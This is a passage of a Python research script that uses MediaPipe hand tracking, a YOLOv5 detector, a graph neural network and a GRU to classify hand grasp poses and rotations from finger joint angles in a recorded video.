self).__init__()\r\n torch.manual_seed(12345)\r\n self.conv1 = GCNConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GCNConv(hidden_channels, hidden_channels)\r\n self.conv3 = GCNConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch): #\r\n # 1. Obtain node embeddings \r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n # 2. Readout layer\r\n x = global_mean_pool(x, batch) # [batch_size, hidden_channels]\r\n\r\n # 3. Apply a final classifier\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Training with GraphConv\r\n\r\nfrom torch_geometric.nn import GraphConv\r\n\r\nclass GNN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GNN, self).__init__()\r\n torch.manual_seed(12345)\r\n\r\n self.conv1 = GraphConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GraphConv(hidden_channels, hidden_channels)\r\n self.conv3 = GraphConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch):\r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n x = global_mean_pool(x, batch)\r\n\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Device configuration\r\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\ndevice = torch.device('cpu')\r\n\r\n# Defining ANN Architechture\r\nmodel_gnn = GNN(hidden_channels=64)\r\nmodel_gnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_grasppose_gnn.pkl\"))\r\nmodel_gnn.to(device)\r\nmodel_gnn.eval()\r\n\r\ncriterion = torch.nn.CrossEntropyLoss()\r\noptimizer = torch.optim.Adam(model_gnn.parameters(), lr=0.01)\r\n\r\n# Data Preprocessing\r\nedge_index = torch.tensor([[0, 1], #[1, 0],\r\n [1, 2], #[2, 1],\r\n [2, 3], #[3, 2],\r\n [0, 4], #[4, 0],\r\n [4, 5], #[5, 4],\r\n [5, 6], #[6, 5],\r\n [0, 7], #[7, 0],\r\n [7, 8], #[8, 7],\r\n [8, 9], #[9, 8],\r\n [0, 10], #[10, 0],\r\n [10, 11], #[11, 10],\r\n [11, 12], #[12, 11],\r\n [0, 13], #[13, 0],\r\n [13, 14], #[14, 13],\r\n [14, 15] #[15, 14] \r\n ],dtype=torch.long)\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP NEURAL NETWORKS RNN\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass RNN(nn.Module):\r\n def __init__(self, input_size, hidden_size, num_layers, num_classes):\r\n super(RNN, self).__init__()\r\n self.num_layers = num_layers\r\n self.hidden_size = hidden_size\r\n\r\n # -> x needs to be: (batch_size, seq, input_size)\r\n\r\n #self.rnn = nn.RNN(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< RNN\r\n # or:\r\n self.gru = nn.GRU(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< GRU\r\n #self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< LSTM\r\n \r\n self.fc = nn.Linear(hidden_size, num_classes)\r\n \r\n def forward(self, x):\r\n # Set initial hidden states (and cell states for LSTM)\r\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) \r\n #c0 = torch.zeros(self.num_layers, x.size(0), 
self.hidden_size).to(device) # <<<<<<<<<<< LSTM\r\n \r\n # x: (n, 28, 28), h0: (2, n, 128)\r\n \r\n # Forward propagate RNN\r\n #out, _ = self.rnn(x, h0) # <<<<<<<<<<< RNN\r\n # or:\r\n #out, _ = self.lstm(x, (h0,c0)) # <<<<<<<<<<< LSTM\r\n # or:\r\n out, _ = self.gru(x, h0) # <<<<<<<<<<< GRU\r\n \r\n # out: tensor of shape (batch_size, seq_length, hidden_size)\r\n # out: (n, 28, 128)\r\n \r\n # Decode the hidden state of the last time step\r\n out = out[:, -1, :]\r\n # out: (n, 128)\r\n \r\n out = self.fc(out)\r\n # out: (n, 10)\r\n return out\r\n\r\n# Device configuration\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# Hyper-parameters \r\nnum_classes = 7\r\nnum_epochs = 50\r\nbatch_size = 1\r\nlearning_rate = 0.001\r\n\r\ninput_size = 15\r\nsequence_length = 10\r\nhidden_size = 128\r\nnum_layers = 2\r\n\r\n# Defining ANN Architechture\r\nmodel_rnn = RNN(input_size, hidden_size, num_layers, num_classes).to(device)\r\nmodel_rnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_gru.pkl\"))\r\nmodel_rnn.to(device)\r\nmodel_rnn.eval()\r\n\r\nimport collections\r\ncoll_hand = collections.deque(maxlen=sequence_length)\r\n\r\nimport pickle\r\nsc_input = pickle.load(open(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\scaler_input.pkl\",'rb'))\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HAND TRACKING : MEDIAPIPE\r\n\r\n### HAND TRACKING: SETUP\r\n\r\nimport mediapipe as mp\r\nmp_drawing = mp.solutions.drawing_utils\r\nmp_hands = mp.solutions.hands\r\n\r\njoint_list_0 = [[2,1,0], [3,2,1], [4,3,2]]\r\njoint_list_1 = [[6,5,0], [7,6,5], [8,7,6]]\r\njoint_list_2 = [[10,9,0], [11,10,9], [12,11,10]]\r\njoint_list_3 = [[14,13,0], [15,14,13], [16,15,14]]\r\njoint_list_4 = [[18,17,0], [19,18,17], [20,19,18]]\r\n\r\n### HAND TRACKING: FUCTION \r\n\r\ndef get_label(index, hand, results):\r\n output = None\r\n for idx, classification in enumerate(results.multi_handedness):\r\n if classification.classification[0].index == index:\r\n \r\n # Process results\r\n label = classification.classification[0].label\r\n score = classification.classification[0].score\r\n text = '{} {}'.format(label, round(score, 2))\r\n \r\n # Extract Coordinates\r\n coords = tuple(np.multiply(\r\n np.array((hand.landmark[mp_hands.HandLandmark.WRIST].x, hand.landmark[mp_hands.HandLandmark.WRIST].y)),\r\n [640,480]).astype(int))\r\n \r\n output = text, coords\r\n \r\n return output\r\n\r\n\r\n\r\ndef draw_finger_angles(image, results, joint_list):\r\n \r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n for joint in joint_list:\r\n\r\n point = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y])\r\n \r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n\r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = 
np.abs(radians*180.0/np.pi)\r\n \r\n if angle > 180.0:\r\n angle = 360-angle\r\n \r\n cv2.putText(image, str(round(angle, 2)), tuple(np.multiply(point, [1920, 1080]).astype(int)),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (50, 50, 50), 1, cv2.LINE_AA)\r\n return image\r\n\r\n\r\ndef get_finger_angles(results, joint_list):\r\n \r\n finger_angles=[]\r\n\r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n \r\n joint_no = 1\r\n for joint in joint_list:\r\n\r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n \r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n #if joint_no == 1 and angle < 90 :\r\n # angle = 90\r\n #elif joint_no == 2 and angle < 110 :\r\n # angle = 110\r\n #elif joint_no == 3 and angle < 90 :\r\n # angle = 90\r\n \r\n joint_no = joint_no + 1\r\n finger_angles.append(round(angle, 2))\r\n\r\n return finger_angles\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Model and File\r\n\r\n# Load Model\r\nPATH_MODEL = r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\\runs\\train\\exp7\\weights\\best.pt\"\r\nmodel_yolo = torch.hub.load(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5', 'custom', path=PATH_MODEL, force_reload=True, source='local')\r\n\r\n#model_yolo = torch.hub.load('ultralytics/yolov5', 'custom', path=PATH_MODEL, force_reload=True)\r\n\r\n\r\n# Make Detection\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\original\\01_top.mp4\" #top_view.mp4 tes03x\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\reduce\\03_top.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_GESTURE\\TUMB\\down_02.mp4\"\r\n\r\nPATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\TLL\\TOP_VIEW\\anom_01.mp4\"\r\n\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Block_Grasping.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Rotation\\GRASP\\4.mp4\"\r\n\r\ncap = cv2.VideoCapture(PATH_VIDEO) # PATH_VIDEO 0\r\n\r\ncv2.namedWindow('Stream',cv2.WINDOW_NORMAL)\r\ncv2.resizeWindow('Stream', (960,540) ) #(960,540) (640,480)\r\n\r\nface_01 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\01.png\", cv2.IMREAD_COLOR)\r\nface_02 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\02.png\", cv2.IMREAD_COLOR)\r\nface_03 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\03.png\", cv2.IMREAD_COLOR)\r\nface_04 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\04.png\", cv2.IMREAD_COLOR)\r\nface_05 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\05.png\", cv2.IMREAD_COLOR)\r\nface_06 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\06.png\", cv2.IMREAD_COLOR)\r\n\r\n#size = 40\r\n#face_01 = cv2.resize(face_01, (size, size))\r\n#face_02 = 
cv2.resize(face_02, (size, size))\r\n#face_03 = cv2.resize(face_03, (size, size))\r\n#face_04 = cv2.resize(face_04, (size, size))\r\n#face_05 = cv2.resize(face_05, (size, size))\r\n#face_06 = cv2.resize(face_06, (size, size))\r\n\r\ngray_face_01 = cv2.cvtColor(face_01, cv2.COLOR_BGR2GRAY)\r\ngray_face_02 = cv2.cvtColor(face_02, cv2.COLOR_BGR2GRAY)\r\ngray_face_03 = cv2.cvtColor(face_03, cv2.COLOR_BGR2GRAY)\r\ngray_face_04 = cv2.cvtColor(face_04, cv2.COLOR_BGR2GRAY)\r\ngray_face_05 = cv2.cvtColor(face_05, cv2.COLOR_BGR2GRAY)\r\ngray_face_06 = cv2.cvtColor(face_06, cv2.COLOR_BGR2GRAY)\r\n\r\nret_01, mask_face_01 = cv2.threshold(gray_face_01, 1, 255, cv2.THRESH_BINARY)\r\nret_02, mask_face_02 = cv2.threshold(gray_face_02, 1, 255, cv2.THRESH_BINARY)\r\nret_03, mask_face_03 = cv2.threshold(gray_face_03, 1, 255, cv2.THRESH_BINARY)\r\nret_04, mask_face_04 = cv2.threshold(gray_face_04, 1, 255, cv2.THRESH_BINARY)\r\nret_05, mask_face_05 = cv2.threshold(gray_face_05, 1, 255, cv2.THRESH_BINARY)\r\nret_06, mask_face_06 = cv2.threshold(gray_face_06, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nimg_00 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\00.jpg')\r\nimg_01 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\01.jpg')\r\nimg_02 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\02.jpg')\r\nimg_03 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\03.jpg')\r\nimg_04 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\04.jpg')\r\nimg_05 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\05.jpg')\r\nimg_06 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\06.jpg')\r\nimg_07 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\07.jpg')\r\nimg_08 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\08.jpg')\r\nimg_09 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\09.jpg')\r\n\r\ngray_img_00 = cv2.cvtColor(img_00, cv2.COLOR_BGR2GRAY)\r\ngray_img_01 = cv2.cvtColor(img_01, cv2.COLOR_BGR2GRAY)\r\ngray_img_02 = cv2.cvtColor(img_02, cv2.COLOR_BGR2GRAY)\r\ngray_img_03 = cv2.cvtColor(img_03, cv2.COLOR_BGR2GRAY)\r\ngray_img_04 = cv2.cvtColor(img_04, cv2.COLOR_BGR2GRAY)\r\ngray_img_05 = cv2.cvtColor(img_05, cv2.COLOR_BGR2GRAY)\r\ngray_img_06 = cv2.cvtColor(img_06, cv2.COLOR_BGR2GRAY)\r\ngray_img_07 = cv2.cvtColor(img_07, cv2.COLOR_BGR2GRAY)\r\ngray_img_08 = cv2.cvtColor(img_08, cv2.COLOR_BGR2GRAY)\r\ngray_img_09 = cv2.cvtColor(img_09, cv2.COLOR_BGR2GRAY)\r\n\r\nret_img_00, mask_img_00 = cv2.threshold(gray_img_00, 1, 255, cv2.THRESH_BINARY)\r\nret_img_01, mask_img_01 = cv2.threshold(gray_img_01, 1, 255, cv2.THRESH_BINARY)\r\nret_img_02, mask_img_02 = cv2.threshold(gray_img_02, 1, 255, cv2.THRESH_BINARY)\r\nret_img_03, mask_img_03 = cv2.threshold(gray_img_03, 1, 255, cv2.THRESH_BINARY)\r\nret_img_04, mask_img_04 = cv2.threshold(gray_img_04, 1, 255, cv2.THRESH_BINARY)\r\nret_img_05, mask_img_05 = cv2.threshold(gray_img_05, 1, 255, cv2.THRESH_BINARY)\r\nret_img_06, mask_img_06 = cv2.threshold(gray_img_06, 1, 255, cv2.THRESH_BINARY)\r\nret_img_07, mask_img_07 = cv2.threshold(gray_img_07, 1, 255, cv2.THRESH_BINARY)\r\nret_img_08, mask_img_08 = cv2.threshold(gray_img_08, 1, 255, cv2.THRESH_BINARY)\r\nret_img_09, mask_img_09 = cv2.threshold(gray_img_09, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nn_frame = 0 \r\nn_capture = 1 # Normal 3 # Realtime 7\r\n#n_contour = 0\r\nn_test = 0\r\n\r\ntimer_task_all = 
[]\r\ntimer_return = 0\r\n\r\ntimer_task_01 = 0\r\ntimer_task_02 = 0\r\ntimer_task_03 = 0\r\ntimer_task_03 = 0\r\ntimer_task_04 = 0\r\ntimer_task_05 = 0\r\ntimer_task_06 = 0\r\ntimer_task_07 = 0\r\ntimer_task_08 = 0\r\n\r\ntimer_flag_01 = True\r\ntimer_flag_02 = True\r\ntimer_flag_03 = True\r\ntimer_flag_04 = True\r\ntimer_flag_05 = True\r\ntimer_flag_06 = True\r\ntimer_flag_07 = True\r\ntimer_flag_08 = True\r\n\r\nans_01 = [2,1,1,2]\r\nans_02 = [1,3,1,1]\r\nans_03 = [2,2,3,4]\r\nans_04 = [5,1,4,1]\r\nans_05 = [4,3,5,6]\r\nans_06 = [1,4,6,1]\r\nans_07 = [5,6,4,3]\r\nans_08 = [5,3,4,5]\r\n\r\ngrasp_pose = [0,0,0,0,0,0,0]\r\n\r\nstart_zero = time.time()\r\nstart = time.time()\r\n\r\n\r\n\r\nwith mp_hands.Hands(min_detection_confidence=0.8, min_tracking_confidence=0.5) as hands:\r\n\r\n while cap.isOpened():\r\n\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n ret, frame_next = cap.read()\r\n\r\n if ret:\r\n \r\n f_height, f_width, f_channel = frame.shape\r\n\r\n #width = 960 # int(img.shape[1] * scale_percent / 100) \r\n #height = 540 # int(img.shape[0] * scale_percent / 100)\r\n #dim = (width, height)\r\n #frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\r\n\r\n if(n_frame % n_capture == 0 ):\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Hand Detection\r\n\r\n timer_task = round (time.time() - start , 2)\r\n\r\n grasp_type = None\r\n rotate_type = None \r\n box_near_hand = None\r\n\r\n task_state = 0\r\n thumb_state = 0\r\n\r\n\r\n # Brightness and Contrast\r\n #alpha = 1.5\r\n #beta = 5\r\n #frame = cv2.addWeighted(frame, alpha, np.zeros(frame.shape, frame.dtype), 0, beta)\r\n \r\n # BGR 2 RGB\r\n frame_hand = cv2.cvtColor(frame_next, cv2.COLOR_BGR2RGB)\r\n # Set flag\r\n frame_hand.flags.writeable = False\r\n # Hand Detections\r\n results = hands.process(frame_hand)\r\n # Set flag to true\r\n frame_hand.flags.writeable = True\r\n # RGB 2 BGR\r\n frame_hand = cv2.cvtColor(frame_hand, cv2.COLOR_RGB2BGR)\r\n\r\n hand_status = False\r\n hand_angle = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n hand_position = [0,0,0,0,0,0,0,0,0]\r\n stream = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n\r\n list_hand_x = []\r\n list_hand_y = []\r\n \r\n ### If hand detected\r\n\r\n # Rendering results\r\n if results.multi_hand_landmarks:\r\n for num, hand in enumerate(results.multi_hand_landmarks):\r\n mp_drawing.draw_landmarks(frame, hand, mp_hands.HAND_CONNECTIONS, \r\n mp_drawing.DrawingSpec(color=(121, 22, 76), thickness=3, circle_radius=4),\r\n mp_drawing.DrawingSpec(color=(250, 44, 250), thickness=3, circle_radius=2),\r\n )\r\n \r\n # Render left or right detection\r\n #if get_label(num, hand, results):\r\n # text, coord = get_label(num, hand, results)\r\n # cv2.putText(image, text, coord, cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 50, 50), 1, cv2.LINE_AA)\r\n \r\n hand_status = True\r\n\r\n ### Measure Angle \r\n # Draw angles to image from joint list\r\n draw_finger_angles(frame, results, joint_list_0)\r\n draw_finger_angles(frame, results, joint_list_1)\r\n draw_finger_angles(frame, results, joint_list_2)\r\n draw_finger_angles(frame, results, joint_list_3)\r\n draw_finger_angles(frame, results, joint_list_4)\r\n\r\n angle_0 = get_finger_angles(results, joint_list_0)\r\n angle_1 = get_finger_angles(results, joint_list_1)\r\n angle_2 = get_finger_angles(results, joint_list_2)\r\n angle_3 = get_finger_angles(results, joint_list_3)\r\n angle_4 = get_finger_angles(results, joint_list_4)\r\n\r\n hand_angle = [ angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], 
angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2] ]\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n \r\n #writer_ang.writerow([ timer, timer_task, \r\n # angle_0[0], angle_0[1], angle_0[2],\r\n # angle_1[0], angle_1[1], angle_1[2],\r\n # angle_2[0], angle_2[1], angle_2[2], \r\n # angle_3[0], angle_3[1], angle_3[2],\r\n # angle_4[0], angle_4[1], angle_4[2], thumb_state ])\r\n\r\n #print( str(timer) + \" - \" + str(hand_angle) )\r\n\r\n ### Measure Distance\r\n \r\n # Create new variabel for wrist \r\n wrist = np.array( [hand.landmark[9].x, hand.landmark[9].y] )\r\n\r\n # Create new variabel for fingertip\r\n tip_0 = np.array([hand.landmark[4].x, hand.landmark[4].y] ) # , hand.landmark[4].z\r\n tip_1 = np.array([hand.landmark[8].x, hand.landmark[8].y] ) # , hand.landmark[8].z\r\n tip_2 = np.array([hand.landmark[12].x, hand.landmark[12].y] ) # , hand.landmark[12].z\r\n tip_3 = np.array([hand.landmark[16].x, hand.landmark[16].y] ) # , hand.landmark[16].z\r\n tip_4 = np.array([hand.landmark[20].x, hand.landmark[20].y] ) # , hand.landmark[20].z\r\n \r\n # Area of Hand\r\n \r\n for i in range(21):\r\n list_hand_x.append(hand.landmark[i].x)\r\n list_hand_y.append(hand.landmark[i].y)\r\n \r\n min_hand_x = int (min(list_hand_x) * f_width)\r\n min_hand_y = int (min(list_hand_y) * f_height)\r\n\r\n max_hand_x = int (max(list_hand_x) * f_width)\r\n max_hand_y = int (max(list_hand_y) * f_height)\r\n \r\n cv2.rectangle(frame, (min_hand_x, min_hand_y),(max_hand_x, max_hand_y), (255, 0, 0), 2) \r\n\r\n\r\n\r\n\r\n # Drawing circle in fingertip\r\n \"\"\"\r\n frame = cv2.circle(frame, ( int (hand.landmark[4].x * vwidth), \r\n int (hand.landmark[4].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[8].x * vwidth), \r\n int (hand.landmark[8].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n\r\n frame = cv2.circle(frame, ( int (hand.landmark[12].x * vwidth), \r\n int (hand.landmark[12].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[16].x * vwidth), \r\n int (hand.landmark[16].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[20].x * vwidth), \r\n int (hand.landmark[20].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \"\"\"\r\n\r\n \r\n \r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n #stream = stream.decode().split(',')\r\n #stream = [eval(i) for i in stream] #round((eval(i)/3.14), 2)\r\n\r\n stream[0] = angle_0[0] / 180\r\n stream[1] = angle_0[1] / 180\r\n stream[2] = angle_0[2] / 180\r\n stream[3] = angle_1[0] / 180\r\n stream[4] = angle_1[1] / 180\r\n stream[5] = angle_1[2] / 180\r\n stream[6] = angle_2[0] / 180\r\n stream[7] = angle_2[1] / 180\r\n stream[8] = angle_2[2] / 180\r\n stream[9] = angle_3[0] / 180\r\n stream[10] = angle_3[1] / 180\r\n stream[11] = angle_3[2] / 180\r\n stream[12] = angle_4[0] / 180\r\n stream[13] = angle_4[1] / 180\r\n stream[14] = angle_4[2] / 180\r\n\r\n x = torch.tensor([ [1],\r\n [stream[0]], [stream[1]], [stream[2]], \r\n [stream[3]], [stream[4]], [stream[5]],\r\n [stream[6]], [stream[7]], [stream[8]],\r\n [stream[9]], [stream[10]], [stream[11]],\r\n [stream[12]], [stream[13]], [stream[14]] ], dtype=torch.float)\r\n #print(x)\r\n \r\n data = Data(x=x, edge_index=edge_index.t().contiguous()) \r\n\r\n 
output_gnn = model_gnn(data.x, data.edge_index, data.batch) #\r\n predicted_gnn = (torch.max(torch.exp(output_gnn), 1)[1]).data.cpu().numpy()\r\n \r\n #predicted_gnn = torch.max(output_gnn, 1)\r\n\r\n probs = torch.nn.functional.softmax(output_gnn, dim=1)\r\n str_probs = str( format((torch.max(probs).item()*100),\".2f\") )\r\n\r\n if predicted_gnn.item() == 0:\r\n cv2.putText(frame, \"Rake \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[0]+=1\r\n\r\n elif predicted_gnn.item() == 1:\r\n cv2.putText(frame, \"Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[1]+=1\r\n\r\n elif predicted_gnn.item() == 2:\r\n cv2.putText(frame, \"Radial Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[2]+=1\r\n\r\n elif predicted_gnn.item() == 3:\r\n cv2.putText(frame, \"Radial Digital Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[3]+=1\r\n\r\n elif predicted_gnn.item() == 4:\r\n cv2.putText(frame, \"Inferior Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[4]+=1\r\n \r\n elif predicted_gnn.item() == 5:\r\n cv2.putText(frame, \"Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n grasp_pose[5]+=1\r\n\r\n elif predicted_gnn.item() == 6:\r\n \r\n if hand.landmark[20].z > hand.landmark[4].z:\r\n cv2.putText(frame, \"Thumbs UP \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n thumb_state = 1\r\n\r\n else:\r\n cv2.putText(frame, \"Thumbs DOWN \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n thumb_state = -1 \r\n \r\n grasp_pose[6]+=1\r\n\r\n grasp_type = predicted_gnn.item()\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n # Feature Scaling\r\n coll_hand.append(hand_angle)\r\n\r\n if len(coll_hand) == sequence_length:\r\n\r\n x_data = np.array(list(coll_hand))\r\n x_train = sc_input.transform(x_data)\r\n x_train = torch.tensor(x_train, dtype=torch.float32).to(device)\r\n x_train = x_train[None, :, :]\r\n \r\n output_rnn = model_rnn(x_train)\r\n confidence_rnn, predicted_rnn = torch.max(output_rnn.data, 1)\r\n \r\n str_conf = str( format(confidence_rnn.item()*10,\".2f\") )\r\n '''\r\n if predicted_rnn.item() == 0:\r\n cv2.putText(frame, \"No Rotation \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 1:\r\n cv2.putText(frame, \"Rotate Type 1 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 2:\r\n cv2.putText(frame, \"Rotate Type 2 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 3:\r\n cv2.putText(frame, \"Rotate Type 3 \" + 